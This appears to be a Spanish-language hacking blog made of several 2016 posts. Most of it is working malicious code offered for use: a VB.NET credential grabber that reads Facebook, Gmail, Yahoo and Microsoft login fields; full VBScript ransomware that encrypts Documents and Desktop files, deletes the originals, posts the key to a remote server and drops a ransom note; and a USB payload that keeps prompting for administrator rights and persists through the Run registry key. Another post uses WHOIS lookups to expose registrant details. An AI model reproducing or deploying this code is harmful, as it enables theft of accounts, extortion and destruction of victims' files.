jueves, 29 de diciembre de 2016

Averiguar Datos De Una Pagina Web

Hoy les mostrare como obtener algunos datos de algunas paginas para eso usaremos una web llamada:
http://whois.domaintools.com/

Que hace pues bueno nos proporciona algunos datos del dueño de la pagina,servidor se aloja,país,correo entre otras cosas.

Lo malo de esta pagina es que aveces no proporciona todos los datos, ya que ciertas personas esconden sus datos ya sea para permanecer en el anonimato,permanecer seguros de ataques o en ciertos caso hay personas que lo hacen para hacer sus fechorías.

Bueno primeramente escojamos una pagina común para un ejemplo, en este ejemplo ya no elegiremos al hacker.net ya que sabemos que pertenece a alex o el brujo como se apoda, eligiéremos a esta:
http://www.radiologyinfo.org/

Nota: No les estoy haciendo publicidad solo las elegí para el ejemplo

Bueno así que ingresaremos la url en el siguiente cuadro de texto de la pagina y pulsamos el botón Search


nos apare sera lo siguiente



hay pueden ver el numero 1 pertenece a sus correos, el 2 a la organización registrada, el 3 fecha de creación que fue en 1999 y espira el contrato en 2021, el 4 a su ip, el 5 a la localización del servidor no de la persona y por ultimo el 6 que es el estatus del dominio si esta activo o inactivo.


Pero mas abajo nos encontramos con otras mas

Registrant ID: 23237610-NSI
Registrant Name: American College of Radiology
Registrant Organization: American College of Radiology
Registrant Street: 1891 PRESTON WHITE DR
Registrant City: Reston
Registrant State/Province: VA
Registrant Postal Code: 20191-4326
Registrant Country: US
Registrant Phone: +1.7037154393
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 
Admin ID: 42105327-NSI
Admin Name: American College of Radiology
Admin Organization: American College of Radiology
Admin Street: 1891 Preston White Drive
Admin City: Reston
Admin State/Province: VA
Admin Postal Code: 20191
Admin Country: US
Admin Phone: +1.703648890
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 

Aquí en estos datos pueden ver el código postal, ciudad, teléfono entre otras cosas.

Pero en este ejemplo no dice el nombre del administrador ni de quien lo registro así que buscaremos en otra pagina por si les interesa el campo nombre y buscaremos en la pagina de:

http://www.cinepolis.com/

Y nos muestra lo siguiente

Registrant Name: Servicios de Personal Cinemas SA de CV
Registrant Organization: Servicios de Personal Cinemas SA de CV
Registrant Street: Av. Camelinas No. 3527 Int. 902
Registrant City: Morelia
Registrant State/Province: Michoacan
Registrant Postal Code: 58270
Registrant Country: MX
Registrant Phone: +52.4433226237
Registrant Phone Ext: 
Registrant Fax: +52.4433226238
Registrant Fax Ext: 
Registrant Email: .mx
Registry Admin ID: 
Admin Name: Lozano Mtz, Juan Carlos
Admin Organization: Servicios de Personal Cinemas S.A. de C.V.
Admin Street: Av. Camelinas No. 3527 Int 902
Admin City: Morelia
Admin State/Province: Michoacan
Admin Postal Code: 58270
Admin Country: MX
Admin Phone: +52.4433220526
Admin Phone Ext: 
Admin Fax: +52.4433226238
Admin Fax Ext: 
Admin Email: 

Como pueden ver esta registrado a nombre de la compañía cinemas, también nos dice la ciudad que es morelia, código postal 58270 y entre otras cosas, pero pasemos a los datos del administrador que revela su nombre ya que como dije al principio hay algunas personas que lo ocultan pero lo veremos mas adelante.

El nombre del administrador es Lozano Mtz, Juan Carlos y párese que todo lo demás es igual a diferencia de que su teléfono que es +52 4433220526  que sea de la compañía o de el quien sabe.


Ahora pondremos otro ejemplo es de esta web:

http://hackearface.net/

Y nos muestra lo siguiente

Nombre: Whois Agent
Organización Whois Privacy Protection Service, Inc.
Dirección postal: PO Box 639, Kirkland WA 98083 US
Teléfono: +1 4252740657
Interno:
Fax: +1 4259744730
Interno:
Correo electrónico:hackearface.net@protecteddomainservices.com

Aquí como pueden ver oculta el nombre ya que Whois Agent quiere decir que esta privado o protegido, como también su correo que dice "protecteddomainservices" y la organización.

Aclaro puse como ejemplo esta web ya que fue la primera que encontré pero párese que no es segura así que no naveguen en ella si no saben lo que hacen y mucho menos introduzcan datos verdaderos

Otra cosa muy importante esta pagina tiene un limite diario creo, ya que si tiene un rato usándola les apare sera el siguiente mensaje.





Bueno saludos Flamer


domingo, 25 de diciembre de 2016

Metodo Averiguar Contraseñas De Facebook, Gmail, Yahoo y Hotmail

Esta ves vengo con un método para averiguar las claves de diferentes web y creo que funciona en varias no nomas las expuestas aquí.

Hace unas horas expuse este tema en el foro:

http://foro.elhacker.net/scripting/aporte_obtener_nombre_de_usuario_y_contrasena_de_facebook_con_un_simple_script-t462593.0.html

Y se me dio una idea y quise hacer algo mas grande, así que se me ocurrió hacerlo en vb.net, pero primero expliquemos el que expuse en el foro, aclaro no es el mismo ya que lo modifique un poco para que funcionara mas bien.

Primero declaramos las variables

option explicit
dim m,t,u,p,IE

Despues creamos un objecto de InternetExplorer

set IE = CreateObject("InternetExplorer.Application")

En la siguiente linea usamos el comando navigate para visualizar la pagina del facebook

IE.Navigate "https://www.facebook.com/"

Y para visualizar la ventana del Internet Explorer usamos este comando

IE.visible = true

Y creamos un ciclo do while para saber si ya cargo la pagina completamente

Do While IE.ReadyState < 4
Loop

Ahora pasamos el titulo de la ventana de inicio de sesión a la variable m

m = IE.LocationName

En la siguiente linea crearemos un ciclo while para saber si estamos en la ventana de inicio de sesión de facebook y cuando cambie el titulo de la ventana este dejara de ejecutarse.

Dentro de este tomamos el valor de el campo "email" y lo aguardamos en la variable "u" y si este campo logra cambiar su contenido preguntamos con el comando if por su valor y su longitud para después aguardar los cambios nuevos en la variable "u"

while IE.LocationName = m
   t = IE.document.GetElementById("email").value
   if t<>u and len(t)>len(u) then
      u = t
   end if   
 
   t =  IE.document.GetElementById("pass").value
   if t<>p and len(t)>len(p) then
      p = t
   end if 
 
   wscript.sleep 100
wend

Con el campo "pass" pasa lo mismo toma su valor y si cambia su contenido, estos cambios serán guardados en la variable "p"

Y por ultimo imprimimos el contenido con el comando msgbox

msgbox u & "        " & p 


Pero como dije al principio de que se me ocurrió otra idea mas grande, y es utilizar este método pero con diferentes paginas en una sola aplicación.

Pues para eso me programe el siguiente programa en vb.net, un poco mas extenso que el anterior y mejorado aquí el code


Option Explicit On
Public Class Form1
    Dim IE As Object
    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        IE = CreateObject("InternetExplorer.Application")
        IE.visible = True
        Timer1.Interval = 1
        Timer1.Start()
        'Me.Visible = False'
    End Sub

    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        Select Case IE.LocationName
            Case "Yahoo - Ingreso"
                If InStr(IE.LocationUrl, "https://login.yahoo.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Yahoo - Ingreso", "login-username", "login-passwd", "https://login.yahoo.com/")
                End If

            Case "Gmail"
                If InStr(IE.LocationUrl, "https://accounts.google.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Gmail", "Email", "Passwd", "https://accounts.google.com/")
                End If
            Case "Facebook - Inicia sesión o regístrate"
                If InStr(IE.LocationUrl, "https://www.facebook.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Facebook - Inicia sesión o regístrate", "email", "pass", "https://www.facebook.com/")
                End If
            Case "Iniciar sesión en tu cuenta Microsoft"
                If InStr(IE.LocationUrl, "https://login.live.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Iniciar sesión en tu cuenta Microsoft", "i0116", "i0118", "https://login.live.com/")
                End If
        End Select
    End Sub
    Function interseptar(title, idu, idp, url)
        On Error Resume Next
        Dim u, p, t As String

        t = ""
        u = ""
        p = ""

        Do While IE.ReadyState < 4
        Loop
        While IE.LocationName = title
            t = IE.document.GetElementById(idu).value
            If t <> u And Len(t) > Len(u) Then
                u = t
            End If

            t = IE.document.GetElementById(idp).value
            If t <> p And Len(t) > Len(p) Then
                p = t
            End If
            System.Threading.Thread.Sleep(100)
        End While

        Timer1.Start()
        interseptar = url & "------" & u & "------" & p & vbCrLf & vbCrLf

    End Function

End Class 


Con un poco mas de imaginación podemos programar que lo capturado de todo el día lo envié a nuestro servidor o por correo y para eso nuestra aplicación tendría que iniciarse al prender la pc victima y otra cosa, es que esto puede funcionar para diferentes paginas.

Una de las desventajas de este programa son de que a veces no captura las claves pero en fin no todo es perfecto

Link del video donde muestro su uso:
https://www.youtube.com/watch?v=NmbFHN2TG5s

saludos Flamer

sábado, 24 de diciembre de 2016

Usar El ClipBoard Desde Vbscript

En esta ocasión vengo a mostrarles como usar el clipboard en vbscript, pero para los que no saben que es clipboard se los digo es el porta papeles y para los que no entiendan a un que es, es la acción de copiar y pegar que usamos comúnmente en la computadora.

Pero se preguntaran que aremos pues les enseñare a como leer el contenido de este usando el vbscript

Primeramente declaramos variables

option explicit
dim objclip,CopyText


Después de esto crearemos el objecto "objclip" que es un objecto htmlfile

Set objclip  = CreateObject("htmlfile")

Ahora pasaremos a leer el contenido que se encuentra en el porta papeles

CopyText = objclip.ParentWindow.ClipboardData.GetData("text")

y por ultimo lo imprimimos con el comando msgbox así

MsgBox CopyText


El codigo completo seria este


option explicit
dim objclip,CopyText
Set objclip  = CreateObject("htmlfile")
CopyText = objclip.ParentWindow.ClipboardData.GetData("text")
MsgBox CopyText


Ahora para borrar el contenido del porta papeles aremos otro programa, empezaremos declarando las variables

option explicit
dim objshell

Después creamos un objecto shell

set objshell = CreateObject("wscript.shell")


y por ultimo ejecutamos el símbolo del sistema con las siguientes lineas

objshell.run "cmd /c echo off | clip"


El código completo seria así


option explicit
dim objshell
set objshell = CreateObject("wscript.shell")
objshell.run "cmd /c echo off | clip"


y al ejecutarlo eliminara todo lo que se encuentra en el porta papeles

Pero se preguntaran para agregar algo en el porta papeles desde el programa o sea que sea programado en ves que lo halla hecho el usuario.

Pues seria casi lo mismo que el anterior con la diferencia de que el "echo off" seria "echo loquesea"
quedaría el código así.

option explicit
dim objshell
set objshell = CreateObject("wscript.shell")
objshell.run "cmd /c echo loquesea | clip"


Este código copiaría la palabra "loquesea" al porta papeles y estaría listo para usarse


Bueno amigos eso es todo saludos Flamer y lo expuesto aquí esta intentado en windows 10 y hice uso del cmd por que el método  "ClipboardData.ClearData" y "ClipboardData.SetData" no me funcionaron


miércoles, 14 de diciembre de 2016

Codificar Archivos Vbs a Vbe con La Herramienta Screnc.exe

Hoy les traigo una herramienta llamada "screnc.exe" esta herramienta nos servirá para codificar nuestros archivos ".vbs" y serán convertidos en archivos ".vbe".

Este programa anteriormente se encontraba en la pagina de microsoft pero acabo de darle una búsqueda y no logre encontrar nada, yo sinceramente no me acuerdo de donde lo conseguí ya que tengo tiempo con el así que lo subí a mediafire para compartirlo con ustedes.

Aqui la descarga: http://www.mediafire.com/file/ddhnjzkr48j641b/screnc.exe

Ahora les enseñare como usarla, pero primeramente crearemos un archivo ".vbs" al cual llamaremos "Ejemplo.vbs" y el código que contendrá este archivo sera el siguiente.


msgbox "hola mundo soy toto",,"aviso de bienvenida"


Ya que tenemos escrito lo anterior aguardamos los cambios y al ejecutarlo nos muestra el mensaje siguiente.




Después de esto nos iremos al símbolo del sistema o cmd como le quieran llamar.

Para eso abrimos la ventana ejecutar, escribimos cmd y presionamos aceptar



En esta ventana nos moveremos hasta la carpeta donde se encuentre el archivo "screnc.exe" y el archivo "Ejemplo.vbs"con el comando "cd".

Ya que se encuentren en dicha carpeta escribiremos lo siguiente.


Screnc Ejemplo.vbs  Salida.vbe



Y verán que se crea el archivo "Salida.vbe" y al ejecutarlo no muestra el mismo mensaje y si lo abrimos con el notepad++ nos muestra lo siguiente.







Ahora si quieren desencriptar el archivo "salida.vbe" pueden mirar un tema anterior que hice donde desencripto un archivo ".vbe" de un virus de macro:

http://elblogdeflamer.blogspot.mx/2016/04/analizando-una-muestra-de-un-virus-de.html


bueno saludos Flamer y creo que eso es todo por hoy


lunes, 5 de diciembre de 2016

Leer Binario En VBScript

Hoy vamos a ver como leer los archivos binarios en vbscript, yo al principio creía que no se podía leer binario en este lenguaje y ase poco creando el ransomware(el cual no es la gran cosa pero aveces me gusta matar el tiempo programando cualquier cosa) tuve la necesidad de leer binario, así que en una búsqueda de 5 minutos encontré esta web:

http://www.gatodev.com/index.php?qa=225695&qa_1=leer-y-escribir-archivos-binarios-en-vbscript

El cual contenía este código:

NOTA: lo pondré por si algún día la pagina borra el tema, se cae o algo por el estilo solo para tener un respaldo.

Function readBinary(path)
Dim a
Dim fso
Dim file
Dim i
Dim ts
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.getFile(path)
If isNull(file) Then
    MsgBox("File not found: " & path)
    Exit Function
End If
Set ts = file.OpenAsTextStream()
a = makeArray(file.size)
i = 0
' Do not replace the following block by readBinary = by ts.readAll(), it would result in broken output, because that method is not intended for binary data' 
While Not ts.atEndOfStream
    a(i) = ts.read(1)
i = i + 1
Wend
ts.close
readBinary = Join(a,"")
End Function

Sub writeBinary(bstr, path) Dim fso Dim ts Set fso = CreateObject("Scripting.FileSystemObject") On Error Resume Next Set ts = fso.createTextFile(path) If Err.number <> 0 Then MsgBox(Err.message) Exit Sub End If On Error GoTo 0 ts.Write(bstr) ts.Close End Sub

Function makeArray(n) ' Small utility function Dim s s = Space(n) makeArray = Split(s," ") End Function 


Viendo el código de esa web me base para crear el mio, que es casi igual pero con unas modificaciones.
Así que para practicar tomaremos mi crackme, el numero 7 que lo encontraran aquí:

http://elblogdeflamer.blogspot.mx/p/mis-cackmes.html


Tratare de explicar todo el código con clama.
Así que primeramente empecemos declarando todas las variables que usaremos

option explicit
Dim x,objsystem,file,i,f,largo


Ahora creamos un objecto FileSystemObject y lo representaremos con la variable objsystem

Set objsystem = CreateObject("Scripting.FileSystemObject")

Luego creamos una referencia al archivo que vamos a leer, que en este caso es el "crackme7.exe" y lo representaremos con la variable file.
OJO donde dice "crackme7.exe" es la ruta del archivo yo lo pongo así por que estoy trabajando en la misma carpeta.

Set file = objsystem.getFile("Crackme7.exe") 

Después de esto inicializamos la variable largo, con el valor del tamaño del archivo en bytes

largo=file.size 


Ya que tenemos enlazado al archivo que esta representado con la variable file, trataremos de abrirlo con el comando OpenAsTextStream así.

Set f = file.OpenAsTextStream()  

Después usaremos el comando Redim para crear un array el cual llamaremos bytes con el tamaño de el archivo, el cual esta representado con la variable largo

redim bytes(largo)  

Ahora para leer los bytes del archivo crearemos un ciclo for, el cual leerá byte por byte del archivo y los almacenara en el array llamado bytes

for i=0 to largo - 1
   bytes(i)=f.read(1)
next  

y para cerrar el archivo usamos el comando close

f.close   

Ya que leímos todos los bytes del archivo crearemos un archivo llamado "dump.txt" con el comando CreateTextFile, para almacenar los datos que leímos y el archivo creado lo representaremos con la variable file.

set file = objsystem.createtextfile("dump.txt")    

Ya que no podemos almacenar los datos de forma binaria, los convertiremos a su valor ascii y los separaremos con 2 guiones

Para eso crearemos un ciclo for para recorrer el array donde se encuentran los datos y de paso escribiremos los nuevos datos con el comando Write

for x = 0 to i - 1
   file.write(asc(bytes(x)) & "--")
next   

Y por ultimo cerramos el archivo con el comando close

file.close    


Aquí el código completo

option explicit
Dim x,objsystem,file,i,f,largo  

Set objsystem = CreateObject("Scripting.FileSystemObject") 

Set file = objsystem.getFile("Crackme7.exe")  

largo=file.size 

Set f = file.OpenAsTextStream()  

redim bytes(largo)

for i=0 to largo - 1
   bytes(i)=f.read(1)
next 

f.close 

set file = objsystem.createtextfile("dump.txt") 

for x = 0 to i - 1
   file.write(asc(bytes(x)) & "--")
next

file.close    



Bueno creo que eso es todo por hoy saludos flamer


lunes, 28 de noviembre de 2016

Codigo De Un Ransomware En VBScript

Esta ves solo vengo con el código fuente de un ransomware hecho por mi en vbscript, elegí  VBScript ya que para mi es mas fácil de usar y su difícil detección por los antivirus.

Y como los script no pueden leer binarios así que este código para que funcione en la PC victima tiene que tener instalado el winrar ya que hace uso de el para poder comprimir los archivos.

Lo que hace es sencillo es tomar los archivos de el escritorio y de mis documentos y comprimir los con una clave aleatoria muy larga y difícil de descifrar, esta clave es enviada a el servidor de el hacker y después de eso los archivos son eliminados quedando solo los rar que creo nuestro ransomware.

Yo lo probé en mi pc por eso en la linea donde tiene que ir el nombre del servidor dice http://localhost

aquí el código


option explicit
dim shell,system,document,x,password,nombre,winrar,ObjHttp,desktop,datos,procesos,p,l,f

randomize

set shell = createobject("wscript.shell")
Set objhttp = createobject("Microsoft.XmlHttp")
set system = createobject("scripting.filesystemobject")
Set procesos =GetObject("winmgmts:")

winrar = shell.ExpandEnvironmentStrings("%PROGRAMFILES%") & "\winrar\rar.exe"
document = shell.SpecialFolders("MyDocuments")
desktop = shell.SpecialFolders("Desktop")

if system.fileexists(winrar) then
   for x = 1 to 1024
      password = password & hex(int((255-16+1)*rnd + 16))
   next
      
   for x = 1 to 100 
      nombre = nombre & hex(int((255-16+1)*rnd + 16))
   next
   
   datos = "nombre=" & nombre & "&password=" & Lcase(password)
   objhttp.open "POST","http://localhost/ransomware/",false
   objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
   objhttp.send datos
      
   if objhttp.responsetext="Los Datos Se Recivieron Correctamente En El Servidor..." then
   
   shell.run "cmd /c cd %PROGRAMFILES%&winrar\rar.exe a -ep2 " & desktop & "\MisDocumentos.rar  " & chr(34) & document & chr(34) & "  -hp" & password & " -r",1
   shell.run "cmd /c cd %PROGRAMFILES%&winrar\rar.exe a -ep2 " & desktop & "\MiEscritorio.rar  " & chr(34) & desktop & chr(34) & "  -hp" & password &" -r",1 

   do while x<>0
      x=0
   wscript.sleep 2000
         set l = procesos.instancesof("win32_process")
         For Each p In l
            if p.name = "Rar.exe" then
               x=x+1       
            end if    
         next
  loop
  
  'borrar(desktop)
  'borrar(document)
     
  set f = system.createtextfile(desktop & "\Recover_My_Files.html")
     f.writeline("<html>")   
  f.writeline("<head>")   
  f.writeline("<title>Practicas De Un Ransomware   ...:::: By Flamer::::...</title>")   
  f.writeline("</head>")   
  f.writeline("<body>")   
  f.writeline("<center>")   
  f.writeline("<h1>ATENCION</h1>")   
  f.writeline("<h4>TUS ARCHIVOS HAN SIDO COMPRIMIDOS CON CONTRASEÑA, PARA RECUPERARLOS INGRESA A ESTA PAGINA E INGRESA EL SIGUIENTE CODIGO:</h4><br><br><br>")   
  f.writeline(nombre)   
  f.writeline("<br><br><br><br><br>")   
  f.writeline("<a href='http://localhost/ransomware/recover.php'>Recuperar Mis Archivos</a> ")   
  f.writeline("</center>")   
  f.writeline("</body>")   
  f.writeline("</html>")   
  
  
  
   else 
     msgbox "Huvo Un Error Al Enviar Los Datos",,"Aviso De Error" 
   end if
   
else
   msgbox "La Aplicacion Winrar No Esta Instalada En Este Equipo, Por Lo Tanto El Ransomware No Se Ejecutara En Este Ordenador...",,"Aviso De Error"
end if
msgbox "Programa Finalizado"

function borrar(ruta)
   dim carpeta,listfiles,listfolders,f
   
   set carpeta = system.getfolder(ruta)
   set listfolders = carpeta.subfolders
   set listfiles = carpeta.files
   
   for each f in listfiles
      f.delete
   next 

   for each f in listfolders
      f.delete
   next   
end function



------------------------------------------------------Actualización---------------------------------------------------

Esta ya no hace uso del winrar, ahora en-cripta los archivos de forma binaria


option explicit
dim shell,fso,document,f,password,desktop,id

set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")

document = shell.SpecialFolders("MyDocuments")
desktop = shell.SpecialFolders("Desktop")

set f = fso.getfolder(document)
id = f.drive.serialnumber 

password = Contrasena(id)

Encriptar(document)
Encriptar(desktop)

msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado" 

function Contrasena(id)
  dim objhttp
  Set objhttp = createobject("Microsoft.XmlHttp")
  
  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  objhttp.send "id=" & id

  Contrasena = objhttp.responsetext
end function

function Encriptar(ruta)
   dim carpeta,listfiles,listfolders,f
   
   set carpeta = fso.getfolder(ruta)
   set listfolders = carpeta.subfolders
   set listfiles = carpeta.files
   
   for each f in listfiles
      archivo(f.path)
   next 

   for each f in listfolders
      Encriptar(f.path)
   next   
end function

function archivo(path)
   dim file,largo,i,f,b,p,n
   
   set file = fso.getfile(path)

   largo=file.size 

   set f = file.OpenAsTextStream()
   redim bytes(largo)
   
   n = 1 
   
   for i=0 to largo - 1
      if n = len(password) then 
      n = 1
   else
         n = n + 1   
      end if   
   p = asc(mid(password,n,1))
      b = asc(f.read(1)) xor p
   bytes(i) = chr(b)
   next 
 
   f.close  
   
   set f = fso.createtextfile(file.path & ".crypt") 
 
   for n = 0 to i - 1
      f.write(bytes(n))
   next
 
   f.close 
   file.delete
end function



bueno saludos Flamer


sábado, 26 de noviembre de 2016

Como Crear Un Payload USB

En este breve tema les mostrare un código hecho por mi en VBScript (un Payload) que ejecuta un bat almacenado en una usb.
Primero busque en google que era un payload y encontré que en la pagina de wikipedia nos dice lo siguiente:

En seguridad computacional, el payload se refiere a la parte del malware que realiza la acción maliciosa.
En el análisis de software malicioso como gusanos, virus o Troyanos, se refiere a los resultados del ataque del software.

La parte maliciosa que aremos sera cargar x programa que se encuentra en nuestra USB con permisos de administrador cada ves que sea insertada en nuestra PC.

Para eso nuestro payload deberá ejecutarse en nuestra PC cada ves que encienda y con permisos de administrador.

Para poder conseguir permisos de administrador tuve que recurrir a un tema anterior aquí el link si quieren he charle un vistazo:

http://elblogdeflamer.blogspot.mx/2016/05/conseguir-permisos-de-administrador-por.html


Bueno aquí les dejo el código con una breve explicación de cada linea y separe un poco las lineas para que no se mirara todo junto:


option explicit
on error resume next  
' aqui le desimos que si hay un error que siga la ejecucion'

dim shell,system,usb,disco,bat,vf 
' declaramos variables'

set shell = createobject("wscript.shell") 
' creamos el objecto shell'

set system = createobject("scripting.filesystemobject")  
' creamos el objecto system'


bat="sus\polo.bat"  
'AQUI PONES LA RUTA DE EL BAT EN LA USB'


if not(system.fileexists("wxs.exe")) then
' preguntamos si existe wxs.exe '
  
   system.copyfile wscript.fullname,"wxs.exe"  
   ' copiamos el wscript adonde se encuentra nuestro vbs con el nombre wxs'
end if 


comprovar  ' funcion insistente que nos dara permisos de administrador'

while true  
' ciclo while infinito'

   set usb = system.drives  
   ' obtenemos la lista de drives conectados  ' 
   
   for each disco in usb  
   ' recoremos la lista de drives con un ciclo for   '
   
      if disco.drivetype=1 then    
  ' preguntamos si el drives es una USB '
   
         if disco.SerialNumber = "273197608" then 
  'aqui preguntamos si es nuestro usb (CAMBIAS ESTO POR TU ID DE USB)'
   
            if system.fileexists(disco.RootFolder & bat) then 
 ' preguntamos si existe el archivo bat'
   
  shell.run "cmd.exe /c " & disco.RootFolder & bat ,0 
        'ejecutamos el bat en modo oculto ' 
      
  while system.driveexists(disco.RootFolder) and err = 0  
    ' ciclo while que pregunta si no sea desconectado nuestra usb'
      
     wscript.sleep 1000 
    'pausa de 1 segundo'
      
   wend 
               err.number=0 
    ' reiniciamos los errores a 0'
      
            end if   
         end if 
      end if
   next
wend

function comprovar
   dim process,list,s,service,objShell 
   'declaramos las variables de la funcion'
   
   Set process =GetObject("winmgmts:") 
   ' creamos un objecto winmgmts'
   
   Set list= process.instancesof("win32_process") 
   ' obtenemos la lista de procesos'
   
   
   s=0 
   ' inicializamos a  0'
   
   
   For Each service In list  
   'ciclo for donde recorremos la lista de procesos en busca de nuestra copia de wscript '
   
   
      if service.name="wxs.exe" then 
  ' pregunta si se esta ejecutando wxs.exe'
   
   
         s=s+1   
   ' si entra al if quiere desir que se esta ejecutando wxs.exe entonses a la variable s se le aumenta 1'
   
   
      end if
   next
   
   if s=0 then 
 ' pregunta si s vale 0 quiere desir que no se esta ejecutando wxs'
   
   
      Set objShell = CreateObject("Shell.Application") 
  'crea un objeto application'
   
   
      objShell.ShellExecute "wxs.exe ", Chr(34) & WScript.ScriptFullName & Chr(34) & " RunAsAdministrator", "", "runas", 0  
  ' se autoejecuta este script con permisos de administrador'
   
   
      comprovar 
  ' y buelve a yamarse el metodo comprovar hasta que el usuario conseda los permisos de administrador'
   end if
end function




ya que tengan copiado el código, lo pegan en bloc de notas y lo aguardan con la extencion ".vbs" yo lo nombre "Payload.vbs"

ahora si quieren saber su numero id de usb aquí les dejo este otro programa


option explicit

dim system,usb,unidad

set system = createobject("scripting.filesystemobject")
unidad=inputbox("Ingresa La Letra De La Unidad" & vbcrlf & vbcrlf & "Ejemplo1--- E  Ejemplo2--- E:    Ejemplo3--- E:\")

if unidad <> "" then
   if system.driveexists(unidad) then
      set usb = system.getdrive(unidad)
      msgbox "Unidad Expecificada: " & usb.rootfolder & vbcrlf & vbcrlf & "Con Nombre: " & usb.volumename & vbcrlf & vbcrlf & "Su Numero Serie Es: " & usb.SerialNumber
   else
      msgbox "Unidad Ingresada No Existente",,"Aviso De Error"
   end if    
else
   msgbox "No Se Ingreso Ninguna Unidad",,"Aviso De Error"
end if



Igual que el anterior lo copian y lo pegan con la extencion ".vbs" y al ejecutar este ultimo programa nos preguntara lo siguiente:




en este cuadro de texto tendrán que ingresar la letra de unidad, tienen 3 diferentes modos de hacerlo

La pura letra de la unidad
1)  E

La letra de la unidad acompañada de los dos puntos
2)  E:

Y por ultimo pueden ingresar la letra de la unidad junto con los 2 puntos seguido de la barra inversa
3)  E:\


los 3  modos funcionan y como respuesta nos manda lo siguiente





Ahora si quieren que su payload se inicie cuando encienda la computadora tendrán que añadirlo al registro.

Abrimos el regedit y nos iremos hasta la sub-clave

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

y agregamos una nueva cadena dando clic derecho y aparecerá lo siguiente




Ustedes pueden ponerle el nombre que ustedes quieran yo le pondre "payload" y para ponerle el valor damos doble clic sobre el y ponemos la ruta del payload así:




por ultimo presionamos aceptar y cuando se inicie nuestra pc nuestro payload se ejecutara y empezara a buscar nuestra usb para ejecutar el bat que se encuentra en el

bueno saludos flamer y creo que eso es todo



martes, 22 de noviembre de 2016

Trabajar Con Archivos Binarios en Python 3

En este tutorial explicare como manejar archivos binarios en python 3, aclaro soy nuevo en python así que les enseñare un poco de lo que se.

Primera mente si no lo tienen instalado python pueden ver mi publicación anterior donde enseño no solo a descargarlo sino a configurarlo con el notepad++:

http://elblogdeflamer.blogspot.mx/2016/11/instalando-python-3-y-configurarlo-con.html

Primero daré una explicación breve de algunos comando que usare para manejar archivos.

Open este comando se utiliza para abrir un archivo, ya sea para escribir en el o para leer el contenido de este.
El camando open lleva 2 parámetros, la ruta del archivo a abrir(no creo que tenga que explicar mucho en este) y el modo de apertura ejemplo:

file = open("ruta","modo_de_apertura")


Los diferentes modos de apertura son estos:

ModosDescripción
rAbre un archivo de sólo lectura.
El puntero del archivo se coloca en el principio  del archivo.
Este es el modo predeterminado.
rbAbre un archivo de sólo lectura en formato binario.
r+Abre un archivo para lectura y escritura.
El puntero del archivo estará en el principio del archivo.
rb+Abre un archivo para la lectura y la escritura en formato binario.
 El puntero del archivo estará en el principio del archivo.
wAbre un archivo para escribir solamente.
Sobrescribe el archivo si el archivo existe.
Si el archivo no existe, se crea un nuevo archivo para escritura.
wbAbre un archivo para escribir sólo en formato binario.
Sobrescribe el archivo si el archivo existe.
Si el archivo no existe, se crea un nuevo archivo para escritura.
w+Abre un fichero para escritura y lectura.
Sobrescribe el archivo existente si existe el archivo.
Si el archivo no existe, se crea un nuevo archivo para la lectura y la escritura.
wb+Abre un archivo, tanto para la escritura y la lectura en formato binario.
Sobrescribe el archivo existente si existe el archivo.
Si el archivo no existe, se crea un nuevo archivo para la lectura y la escritura.

Read este comando se utiliza para leer el contenido del archivo abierto en modo lectura

Write se utiliza para escribir dentro del archivo abierto en modo escritura


Para este tutorial usare mi crackme 7 que lo pueden descargar de mi lista de crackmes aquí:
http://elblogdeflamer.blogspot.mx/p/mis-cackmes.html


como verán en la siguiente imagen, en mi crackme7 se necesita parchar el botón




Así que crearemos un programa en python que active el botón.

Nota: No mostrare el proceso en el ollydbg para activar el botón para no hacer el tema mas largo, solo les mostrare las posiciones de memoria que hay que modificar con el programa

Para obtener la posición de memoria compare el archivo original con el archivo crackeado con un editor hexadecimal como se muestra en la imagen



Nota: el editor que use lo pueden descargar desde aquí:
https://mh-nexus.de/en/hxd/


Y como ven en la imagen solo tenemos que cambiar el "53" por el "56", así que abriremos el notepad++ y tecleamos el siguiente código


import binascii   # importamos el modulo binascii

archivo = open('C:/Users/Flamer/Desktop/crackme7.exe','rb') # abrimos el archivo crackme7.exe
byte = archivo.read()  # Leemos todos los bytes del archivo
archivo.close  # Cerramos el archivo

w = binascii.unhexlify('56') # Convertimos el valor 56 que es string a binario con el comando unhexlify

code = byte[0:9142] + w + byte[9143:len(byte)]  # insetartamos el byte anterior(el 56 convertido a byte) en la variable code

file = open('C:/Users/Flamer/Desktop/crackme7.exe','wb')  # abrimos el archivo crackme7.exe
file.write(code) # Escribimos los bytes anteriores
file.close  # Cerramos el archivo

print ("terminamos")  # Mensaje de terminamos


OJO: Ustedes cambian la ruta del archivo

Ya que tenemos el código lo aguardan con el formato ".py", yo lo nombre "activa_boton.py" y al ejecutarlo les parchara el archivo crackme7.exe activando el boton.


Ahora les mostrare otro código donde leeremos todos los bytes del archivo crackme7.exe y obtendremos su valor ascii para después separarlos con dos guiones.


import binascii # importamos el modulo binascii

archivo = open('C:/Users/Flamer/Desktop/crackme7.exe','rb') #abrimos el archivo crackme7

byte = archivo.read() #leemos todos los bytes
code = binascii.hexlify(byte) # transformamos los bytes a valores hexadecimal en formato string

c = "" # inicializamos la variable c
largo = len(code) # obtenemos la longitud de la varible code

for x in range(0,largo,2): # ciclo for donde la variable x inicia en 0 e incrementara de 2 en 2 y termina en el valor que contenga la variable largo
